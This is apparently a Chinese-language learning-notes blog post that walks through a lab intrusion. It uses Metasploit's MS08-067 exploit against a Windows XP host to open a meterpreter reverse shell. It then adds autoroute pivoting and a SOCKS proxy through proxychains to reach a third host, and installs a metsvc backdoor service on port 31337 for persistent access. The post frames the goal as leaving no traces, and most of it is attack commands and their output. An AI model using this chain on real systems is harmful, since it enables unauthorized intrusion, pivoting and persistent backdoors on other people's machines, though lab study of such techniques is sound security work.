前言
渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹
一、使用场景
主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c
本期例子,a主机使用kali,b主机winxp,c主机linux
二、实施步骤
1.渗透b主机
因为目标位winxp,先使用最常用的MS08_067漏洞测试
打开数据库
┌──(root💀kali)-[~]
└─# service postgresql start
进入msf搜索ms08_067,使用并配置好参数
msf6 > search ms08_067
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.115
rhosts => 192.168.1.115
进行攻击
msf6 exploit(windows/smb/ms08_067_netapi) > run
[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.115:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.115
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.115:1384) at 2021-05-09 09:20:58 +0800
meterpreter >
成功得到meterpreter权限,使用autoroute添加路由项,添加的地址是c主机地址
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] No routes have been added yet
meterpreter > run autoroute -s 192.168.1.106
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.1.106/255.255.255.0...
[+] Added route to 192.168.1.106/255.255.255.0 via 192.168.1.115
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.106 255.255.255.0 Session 1
meterpreter >
background返回
到这里我们已经获取了b主机的meterpreter权限,成功渗透并添加了路由项
2.建立socks代理服务器
使用socks模块,配置好参数直接run
msf6 exploit(windows/smb/ms08_067_netapi) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set version 4a
version => 4a
msf6 auxiliary(server/socks_proxy) > set srvhost 127.0.0.1
srvhost => 127.0.0.1
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
代理服务器端口已经打开,紧接着还要配置etc/proxychains.conf文件
┌──(root💀kali)-[/]
└─# cat etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 1080 #修改处
文件的socks4 要改成这样的,可以使用vim修改,上一篇有提到过vim基本操作
到这里命令行内已经配置完毕
3.设置浏览器代理
本人是用的是kali自带的firefox esr,设置代理
设置好代理后进行访问
我这里没有访问成功的原因应该是目标的www文件夹内没有文件,所以访问不到。
4.设置永久访问权限
对b主机的渗透很容易丢失,所以有必要进行权限持久化,这里通过安装metSVC
meterpreter > run metsvc -A
[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\MWPrEozxdnwJwU...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
[*] Trying to connect to the Meterpreter service at 192.168.1.115:31337...
meterpreter > [*] 192.168.1.115 - Meterpreter session 2 closed. Reason: Died
meterpreter > [*] Meterpreter session 2 opened (192.168.1.115:1385 -> 192.168.1.115:31337) at 2021-05-09 09:36:10 +0800
可以看到,metSVC在端口31337上创建一个服务,然后上传一个恶意软件,今后,每当需要访问该服务,只需要使用handler,将payload设置成metsvc_bing_tcp,就可以再次访问
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/metsvc_bind_tcp
payload => windows/metsvc_bind_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/metsvc_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST no The target address
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lport 31337
lport => 31337
msf6 exploit(multi/handler) > set rhost 192.168.1.115
rhost => 192.168.1.115
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 192.168.1.115:31337
[*] Meterpreter session 7 opened (192.168.1.115:1387 -> 192.168.1.115:31337) at 2021-05-09 09:45:09 +0800
meterpreter >
成功进入
总结
本文简单介绍了突破meterpreter脚本和建立永久访问权限,本人也在学习当中,仅供参考,作为学习笔记使用,欢迎一起讨论。